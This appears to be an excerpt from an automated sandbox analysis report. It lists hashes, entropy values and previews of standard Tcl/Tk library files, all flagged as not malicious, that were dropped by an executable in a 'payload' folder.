                                                                                                                                                                                                                                            MD5:1EC38B05B53ECF2DD3A90164C4693934
                                                                                                                                                                                                                                            SHA1:00900F0ADDB7526C63C67CA1662C038E95A79245
                                                                                                                                                                                                                                            SHA-256:7E6E2369C19DD19A41BE27BB8AD8DF5BE8B0096ED045C8B2C2D2F0916D494079
                                                                                                                                                                                                                                            SHA-512:47A8DAAB1B891FF09A94AF01B6673213392F70C6C1EE53D95A59D6E238FD06B0E80FA21C7279A9ADA891F5CA5B86E4D6B696EE8CFE14BFEF0ACCC9759AF1419A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:WET) {.. {-9223372036854775808 0 0 WET}.. {228877200 3600 1 WEST}.. {243997200 0 0 WET}.. {260326800 3600 1 WEST}.. {276051600 0 0 WET}.. {291776400 3600 1 WEST}.. {307501200 0 0 WET}.. {323830800 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):154
                                                                                                                                                                                                                                            Entropy (8bit):4.8800842076244715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/taFBURFB:SlSWB9vsM3yzTHAIgm6N/YFaRX
                                                                                                                                                                                                                                            MD5:DDB6F69CA4F0EF6A708481F53F95EAB9
                                                                                                                                                                                                                                            SHA1:A63E900A9257E9D73B4BB4BACBA8133C3D1DC41B
                                                                                                                                                                                                                                            SHA-256:A06E8CCCF97CC8FB545DFDB4C89B5E5C8EDF0360547BDC1823B4AC47B1556C31
                                                                                                                                                                                                                                            SHA-512:C8EA1039BE001F5EF52662B28DBF46D02E4848F08F05923850DEA1994732037B4C8D6030B742D97FA4276AF5FEE3F17C47C7DDA4F44DD23244F9976A076D5CC4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5030
                                                                                                                                                                                                                                            Entropy (8bit):4.838527643033185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:HgTQWiZuhdFQJmuldFQofsGP3R1hF9Dl19arB0E9Dl1YoaEhHe2Gu/q1ZFyJRpqk:8iZUroxvR197ABr971h5GIqrmbqIc+b/
                                                                                                                                                                                                                                            MD5:70450A0CF04EF273EFF2B070053FCFA6
                                                                                                                                                                                                                                            SHA1:47974D6C0FC986EE1273C4E13DDB9E1288CEF0FF
                                                                                                                                                                                                                                            SHA-256:678F891615E2209A8ECBA17857922A9723E78709ADB983032E89CA706000C44D
                                                                                                                                                                                                                                            SHA-512:AFD3E47324D1497CC46AC6141191FCEB843977D0B0285C807FF8985DCC56FDE10977F57D503D986CD2C1EDC6C62F01E405A0EB483340B247B129FC8D6D9FE689
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# word.tcl --..#..# This file defines various procedures for computing word boundaries in..# strings. This file is primarily needed so Tk text and entry widgets behave..# properly for different platforms...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998 Scritpics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# The following variables are used to determine which characters are..# interpreted as white space.....if {$::tcl_platform(platform) eq "windows"} {.. # Windows style - any but a unicode space char.. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\S}.. }.. if {![info exists ::tcl_nonwordchars]} {...set ::tcl_nonwordchars {\s}.. }..} else {.. # Motif style - any unicode word char (number, letter, or underscore).. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\w}.. }.. if {![info exists ::tcl_nonwordchar
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8806
                                                                                                                                                                                                                                            Entropy (8bit):4.863085192885279
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:RpwYLapGk1BlM4UBIHpJFVUXUziMJ5Kxyk55qxUr7Vdk5vNR:RuYfvMdOXyj+01f
                                                                                                                                                                                                                                            MD5:C5E9A2E32AE83A79DF422D1145B692DF
                                                                                                                                                                                                                                            SHA1:08350F930FB97A95970122920C91FB9CED8329E9
                                                                                                                                                                                                                                            SHA-256:8822365EE279BEBF7A36CFDEDBA1114762F894781F4635170CC5D85FF5B17923
                                                                                                                                                                                                                                            SHA-512:71420E15A3D63329560074F6FFAD42CB464401284BC29D0DC8E34D83F8F77079F26BB4C5703E656A48E6931C3DBF6B873756FB212D0860483E0301B29EDE1212
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# bgerror.tcl --..#..#.Implementation of the bgerror procedure. It posts a dialog box with..#.the error message and gives the user a chance to see a more detailed..#.stack trace, and possible do something more interesting with that..#.trace (like save it to a log). This is adapted from work done by..#.Donal K. Fellows...#..# Copyright (c) 1998-2000 by Ajuba Solutions...# Copyright (c) 2007 by ActiveState Software Inc...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::dialog::error {.. namespace import -force ::tk::msgcat::*.. namespace export bgerror.. option add *ErrorDialog.function.text [mc "Save To Log"] \...widgetDefault.. option add *ErrorDialog.function.command [namespace code SaveToLog].. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault.. if {[tk windowingsystem] eq "aqua"} {...option add *ErrorDialog*background systemAlertBackgroundActi
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21612
                                                                                                                                                                                                                                            Entropy (8bit):4.947590677310969
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:Tv7cBCAsj9oqlFFSsB3VfRt+lMpWaNwJgzCHarc6gAsj9oqlFFSsB3VlRtYlMpBz:TvweHBBTfIZxHBnZWqbJPBFIaVlCj26+
                                                                                                                                                                                                                                            MD5:AEB53F7F1506CDFDFE557F54A76060CE
                                                                                                                                                                                                                                            SHA1:EBB3666EE444B91A0D335DA19C8333F73B71933B
                                                                                                                                                                                                                                            SHA-256:1F5DD8D81B26F16E772E92FD2A22ACCB785004D0ED3447E54F87005D9C6A07A5
                                                                                                                                                                                                                                            SHA-512:ACDAD4DF988DF6B2290FC9622E8EACCC31787FECDC98DCCA38519CB762339D4D3FB344AE504B8C7918D6F414F4AD05D15E828DF7F7F68F363BEC54B11C9B7C43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# button.tcl --..#..# This file defines the default bindings for Tk label, button,..# checkbutton, and radiobutton widgets and provides procedures..# that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 2002 ActiveState Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for buttons...#-------------------------------------------------------------------------....if {[tk windowingsystem] eq "aqua"} {.... bind Radiobutton <Enter> {...tk::ButtonEnter %W.. }.. bind Radiobutton <1> {...tk::ButtonDown %W.. }.. bind Radiobutton <ButtonRelease-1> {...tk::ButtonUp %W.. }.. bind Checkbutton <Enter> {...tk::ButtonEnter %W
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9960
                                                                                                                                                                                                                                            Entropy (8bit):4.802555950168837
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:HKOdkMpU9YUp8UIhMYYicln9Die0luVZat3pIp5Y3sF1P8Bg8p6trIOzvKsOiCLU:HyMm9J8wPx70luex4C8Fygq6tohef+0J
                                                                                                                                                                                                                                            MD5:818E4F0112931F12B4FAC4CAD262814C
                                                                                                                                                                                                                                            SHA1:AC7060DF952F9DB52C3687B8F5E6AA4ADF06992E
                                                                                                                                                                                                                                            SHA-256:35B208E8570B0D1E0CA1C911D4FE02EE3B0CFE5667CF1BDEC006CF9D043122BA
                                                                                                                                                                                                                                            SHA-512:0C535B6621BC83412B7A64CB6AC2BA526B8E49BB5F6BC5EBEDA41D223D68DEB031DB9C8A31F8671BC5F327D720942E7FDAE3328334B0B550AC991191F96909D6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# choosedir.tcl --..#..#.Choose directory dialog implementation for Unix/Mac...#..# Copyright (c) 1998-2000 by Scriptics Corporation...# All rights reserved.....# Make sure the tk::dialog namespace, in which all dialogs should live, exists..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}....# Make the chooseDir namespace inside the dialog namespace..namespace eval ::tk::dialog::file::chooseDir {.. namespace import -force ::tk::msgcat::*..}....# ::tk::dialog::file::chooseDir:: --..#..#.Implements the TK directory selection dialog...#..# Arguments:..#.args..Options parsed by the procedure...#..proc ::tk::dialog::file::chooseDir:: {args} {.. variable ::tk::Priv.. set dataName __tk_choosedir.. upvar ::tk::dialog::file::$dataName data.. Config $dataName $args.... if {$data(-parent) eq "."} {.. set w .$dataName.. } else {.. set w $data(-parent).$dataName.. }.... # (re)create the dialog box if necessary.. #.. if {![winfo exis
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22103
                                                                                                                                                                                                                                            Entropy (8bit):5.03166227244502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:lJGidpe3JQDUd6hgp6EQstzQf+a9DPbS43/H//cO802UeeVnZmM6BA0kyVJv9Qpu:Gep6JCwQDPbLPaRCzTdMAe
                                                                                                                                                                                                                                            MD5:AD86E0265C307348A16E9E4B64D8F235
                                                                                                                                                                                                                                            SHA1:66EC6726DF997EE6096F642EBBBDB8C3201BA571
                                                                                                                                                                                                                                            SHA-256:D210DCFA9ADB4C23E44EBF744839158CAB4E21EACF9483C6BA91BA6EC4660EB8
                                                                                                                                                                                                                                            SHA-512:A0C9DF815FE54C26EED69C84B29FD829EB1B7E43D2787E98C71D091607226532F6F0E9213E83FF8263FCB6DA892178029D5EF475FD46D22F9BB8AB31B87BF438
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# clrpick.tcl --..#..#.Color selection dialog for platforms that do not support a..#.standard color selection dialog...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# ToDo:..#..#.(1): Find out how many free colors are left in the colormap and..#. don't allocate too many colors...#.(2): Implement HSV color selection...#....# Make sure namespaces exist..namespace eval ::tk {}..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::color {.. namespace import ::tk::msgcat::*..}....# ::tk::dialog::color:: --..#..#.Create a color dialog and let the user choose a color. This function..#.should not be called directly. It is called by the tk_chooseColor..#.function when a native color selector widget does not exist..#..proc ::tk::dialog::color:: {args} {.. variable ::tk::Priv.. set dataName __tk__color.. upvar ::tk::dialog::color::$da
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8690
                                                                                                                                                                                                                                            Entropy (8bit):5.098389551322902
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:u4R7+/gFw/MEN55fO7eyjt4bjC+gR8e3vwLln/+LVtUw0tXK4jA:u4l+/gFeMI55Xyjt4bjC+gOe3Ih/+LV1
                                                                                                                                                                                                                                            MD5:ABF277E4F62423F4345B6AD65640B8C2
                                                                                                                                                                                                                                            SHA1:E66A4E37D51C7827C9ACA449A42E0966AACBC8C8
                                                                                                                                                                                                                                            SHA-256:C7DA292CCF5F413E599C3491C331FFD58CF273F8477FACB097E6F36CF1F32A08
                                                                                                                                                                                                                                            SHA-512:AA9F75D7C5C915B5FCD2F454856D080D186AB9BA149DC139FEAF7F4AC3DC51E6769E138E3B1BE45B3FEC3AE744189DE44DB2B748F0628FF13E4E733B9CD68BD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# comdlg.tcl --..#..#.Some functions needed for the common dialog boxes. Probably need to go..#.in a different file...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# tclParseConfigSpec --..#..#.Parses a list of "-option value" pairs. If all options and..#.values are legal, the values are stored in..#.$data($option). Otherwise an error message is returned. When..#.an error happens, the data() array may have been partially..#.modified, but all the modified members of the data(0 array are..#.guaranteed to have valid values. This is different than..#.Tk_ConfigureWidget() which does not modify the value of a..#.widget record if any error occurs...#..# Arguments:..#..# w = widget record to modify. Must be the pathname of a widget...#..# specs = {..# {-commandlineswitch resourceName ResourceClass defaultValue verifier}..# {....}..# }..#..# flags
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):33347
                                                                                                                                                                                                                                            Entropy (8bit):4.995865221021151
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:jMpwGU6OGEJemVueuR3fitsHI76Su6qKQjGCy1HyOnmTTRV+po2mBh6S5mDjbHqC:jMpdUDGEJpC6+oVeKQPjnD2jVfV/
                                                                                                                                                                                                                                            MD5:4CA2E90A125FFD6191D0C5AC6818D18F
                                                                                                                                                                                                                                            SHA1:855F10234FA1D65521C2508206EA58DC565E452B
                                                                                                                                                                                                                                            SHA-256:A4B21DBF699C20EA5AC334EC109F731BE8EB2B8F9A34CCC2EBE538F4BF8A05F8
                                                                                                                                                                                                                                            SHA-512:ED5AE05A7F1D379F8343FF4AD7EF561C5C4D9B7E02399A7281DF8B8930B924B0482FDC5B4E3F90C2214ADA4F87D9A5E64DB2259194C58A2135D969C01BBE64F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# console.tcl --..#..# This code constructs the console window for an application. It..# can be used by non-unix systems that do not have built-in support..# for shells...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 2007-2008 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# TODO: history - remember partially written command....namespace eval ::tk::console {.. variable blinkTime 500 ; # msecs to blink braced range for.. variable blinkRange 1 ; # enable blinking of the entire braced range.. variable magicKeys 1 ; # enable brace matching and proc/var recognition.. variable maxLines 600 ; # maximum # of lines buffered in console.. variable showMatches 1 ; # show multiple expand matches.. variable useFontchooser [llength [info command ::tk::fontchooser]
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5988
                                                                                                                                                                                                                                            Entropy (8bit):4.829498876074983
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:qFR55woFFEciKwKClFEOTIhDHWyzaoj9zza7v0J7:qL55jiKwKCzTIhDbzaojhSG7
                                                                                                                                                                                                                                            MD5:B2B3AA971D42FDBF92F13B45111EE1D3
                                                                                                                                                                                                                                            SHA1:A74F2C2707463D6E209D0E0C96D75083AC6920A5
                                                                                                                                                                                                                                            SHA-256:1C977052C1D8293CC5FE4198A538BECA9BC821AF85E76E4EEFBFB75B33CE8BED
                                                                                                                                                                                                                                            SHA-512:146F658DA3E6E9176FA51C9836D7C1DCFC14E148A26B224155F6493C195A7FB20C2DC4EE21994E5A193B8DA8561C75374E830304F94F0C844E52AD829F6810D5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# dialog.tcl --..#..# This file defines the procedure tk_dialog, which creates a dialog..# box containing a bitmap, a message, and one or more buttons...#..# Copyright (c) 1992-1993 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#..# ::tk_dialog:..#..# This procedure displays a dialog box, waits for a button in the dialog..# to be invoked, then returns the index of the selected button. If the..# dialog somehow gets destroyed, -1 is returned...#..# Arguments:..# w -..Window to use for dialog top-level...# title -.Title to display in dialog's decorative frame...# text -.Message to display in dialog...# bitmap -.Bitmap to display in dialog (empty string means none)...# default -.Index of button that is to display the default ring..#..(-1 means none)...# args -.One or more strings to display in buttons
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):18440
                                                                                                                                                                                                                                            Entropy (8bit):4.982597499983157
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:mDfyPIlBk3yrt8qLjtpa+qh+rA4rsWRWrrMUtCPnkKYNlPp64ZnCD:mDfyPIlBk3yJ8mtpaplcp6o
                                                                                                                                                                                                                                            MD5:007F42FBCDC57652AC8381F11AF7FB67
                                                                                                                                                                                                                                            SHA1:1BB1B0FCAD6F5633D1BEB8903112F180B1C4BA7F
                                                                                                                                                                                                                                            SHA-256:65BA33A1E0B21E8E074780A51189CEE6FD9926C85273E9E7633987FC212A17B2
                                                                                                                                                                                                                                            SHA-512:A27089719ADAFC48B5ABB905E40D0C6A0A2507526223D72C1CFF36AB7C15362C6F0B8EE5775181BA1730852802AFA64631EE3720E624B630E3274BFB32F6A59A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# entry.tcl --..#..# This file defines the default bindings for Tk entry widgets and provides..# procedures that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#...start dragging out a selection)...# pressX -..X-coordinate at which the mouse button was pressed...# selectMode -..The style of selection currently underway:..#...char, word
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5035
                                                                                                                                                                                                                                            Entropy (8bit):4.819523401259934
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:J3MRZZ7HWb/6OgRKjtS6Mn9GRZZ7HWb2Y6aO6R5nh76SMoB2kd82KtTpsi2D0DSn:CRZdPul1RZdFaRf0XoB2gZKZpsi2pn
                                                                                                                                                                                                                                            MD5:63B219BE9AFF1DE7DE2BAF0E941CAE38
                                                                                                                                                                                                                                            SHA1:A2FEBB31380E12FF01E6F641FE8B4F815941462F
                                                                                                                                                                                                                                            SHA-256:8872F236D7E824AEC0ACD4BACC00FDD7EC9BC5534814ECF2160610C10647B7C5
                                                                                                                                                                                                                                            SHA-512:057700F8FDE4B7C3D7AB7CEFD6C531060BF2B1B3B727CAD6A37ECD42EBC557765D94B83ADD438BD5AFA1F6F919D80AE755A8D98918981167B871F31AD42FDF5E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# focus.tcl --..#..# This file defines several procedures for managing the input..# focus...#..# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_focusNext --..# This procedure returns the name of the next window after "w" in..# "focus order" (the window that should receive the focus next if..# Tab is typed in w). "Next" is defined by a pre-order search..# of a top-level and its non-top-level descendants, with the stacking..# order determining the order of siblings. The "-takefocus" options..# on windows determine whether or not they should be skipped...#..# Arguments:..# w -..Name of a window.....proc ::tk_focusNext w {.. set cur $w.. while {1} {.....# Descend to just before the first child of the current widget......set parent $cur...set children [winfo children $cur]...set i -1.....# Look for the next sibling that isn't a top-leve
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):18232
                                                                                                                                                                                                                                            Entropy (8bit):4.723225284452692
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:NoRqdguMCeor/4VxgU80zNxWHKVozN5EaKdhsbyM:NoRqdguMCeor/4VxgUnzN0KSDEk
                                                                                                                                                                                                                                            MD5:CFA99C2D3F02AE6538809774699A9CE7
                                                                                                                                                                                                                                            SHA1:DADB7B3D1D9531710BA7D3025CE18F6F8149F280
                                                                                                                                                                                                                                            SHA-256:4EE521F4980A5056077005B748717D91CB6B17342CDD20135962AB92A665B580
                                                                                                                                                                                                                                            SHA-512:DCF54AAEA439C986AE28CEC0241F204BB5001DE4E98C2E7A9C282F9E47747AD62E9B2CF6FBBAC068BF1F1BB0AAC866F85476E9EE79935CE1E3656F122C2D002D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# fontchooser.tcl -..#..#.A themeable Tk font selection dialog. See TIP #324...#..# Copyright (C) 2008 Keith Vetter..# Copyright (C) 2008 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::fontchooser {.. variable S.... set S(W) .__tk__fontchooser.. set S(fonts) [lsort -dictionary -unique [font families]].. set S(styles) [list \.. [::msgcat::mc Regular] \.. [::msgcat::mc Italic] \.. [::msgcat::mc Bold] \.. [::msgcat::mc {Bold Italic}] \.. ].. set S(sizes) {8 9 10 11 12 14 16 18 20 22 24 26 28 36 48 72}.. set S(strike) 0.. set S(under) 0.. set S(first) 1.. set S(-parent) ... set S(-title) {}.. set S(-command) "".. set S(-font) TkDefaultFont.. set S(bad) [list ]..}....proc ::tk::fontchooser::Canonical {} {.. variable S.... foreach style $S(styles
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17565
                                                                                                                                                                                                                                            Entropy (8bit):4.959816621842895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:FNP8nO9Wo8k5NfQH8EsOy8WMdbffNCvHshPOw7jW:FNf8uNfQH89Z8WMdz1vDW
                                                                                                                                                                                                                                            MD5:FDB839B85C4CEB34DEC04E0EBD6A3C96
                                                                                                                                                                                                                                            SHA1:0FD8981093CC6ED9927D1DDE708FECE84B9C5E6F
                                                                                                                                                                                                                                            SHA-256:07812124D27E47621AF74FDB90C777D3219B02F657FC2F97F606C69EF9468A01
                                                                                                                                                                                                                                            SHA-512:E65616B3F6BDC3910FC90E9710426370AA4B0A0D9EB6289871B9C30A98A2F2B5CC1E471B63203210AAE89120F20F164A33E01DA45BCCCCCEC7BFC1CCFD70FAC7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# iconlist.tcl..#..#.Implements the icon-list megawidget used in the "Tk" standard file..#.selection dialog boxes...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...# Copyright (c) 2009 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# API Summary:..#.tk::IconList <path> ?<option> <value>? .....#.<path> add <imageName> <itemList>..#.<path> cget <option>..#.<path> configure ?<option>? ?<value>? .....#.<path> deleteall..#.<path> destroy..#.<path> get <itemIndex>..#.<path> index <index>..#.<path> invoke..#.<path> see <index>..#.<path> selection anchor ?<int>?..#.<path> selection clear <first> ?<last>?..#.<path> selection get..#.<path> selection includes <item>..#.<path> selection set <first> ?<last>?.....package require Tk....::tk::Megawidget create ::tk::IconList ::tk::FocusableWidget {.. variable w canvas sbar accel accelCB fill font index \...itemList itemsPerColumn list
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11037
                                                                                                                                                                                                                                            Entropy (8bit):6.048349526382653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0nEPytJLl1S47T3YqN5/vkJpnhXqBB4aw2rqZiygTtYTpOq/pc75Mk:xqLz7F5KTqBBLuZ1gTSsqhk
                                                                                                                                                                                                                                            MD5:995A0A8F7D0861C268AEAD5FC95A42EA
                                                                                                                                                                                                                                            SHA1:21E121CF85E1C4984454237A646E58EC3C725A72
                                                                                                                                                                                                                                            SHA-256:1264940E62B9A37967925418E9D0DC0BEFD369E8C181B9BAB3D1607E3CC14B85
                                                                                                                                                                                                                                            SHA-512:DB7F5E0BC7D5C5F750E396E645F50A3E0CDE61C9E687ADD0A40D0C1AA304DDFBCEEB9F33AD201560C6E2B051F2EDED07B41C43D00F14EE435CDEEE73B56B93C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# icons.tcl --..#..#.A set of stock icons for use in Tk dialogs. The icons used here..#.were provided by the Tango Desktop project which provides a..#.unified set of high quality icons licensed under the..#.Creative Commons Attribution Share-Alike license..#.(https://creativecommons.org/licenses/by-sa/3.0/)..#..#.See http://tango.freedesktop.org/Tango_Desktop_Project..#..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::icons {}....image create photo ::tk::icons::warning -data {.. iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAABSZJREFU.. WIXll1toVEcYgL+Zc87u2Yu7MYmrWRuTJuvdiMuqiJd4yYKXgMQKVkSjFR80kFIVJfWCWlvpg4h9.. 8sXGWGof8iKNICYSo6JgkCBEJRG8ImYThNrNxmaTeM7pQ5IlJkabi0/9YZhhZv7///4z/8zPgf+7.. KCNRLgdlJijXwRyuDTlcxV9hbzv8nQmxMjg+XDtiOEplkG9PSfkztGmTgmFQd+FCVzwa3fYN/PHZ.. AcpBaReicW5xcbb64IEQqko8Lc26d/58cxS+/BY6hmJvyEfQBoUpwWCmW1FErKaGWHU13uRk4QkE.. UtxQNFR7QwIoB4eiKD9PWbVKbb10CZmaCqmpxCormRYO26QQx85B0mcD+AeK0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):329
                                                                                                                                                                                                                                            Entropy (8bit):4.3973643486226655
                                                                                                                                                                                                                                            Encrypted:false
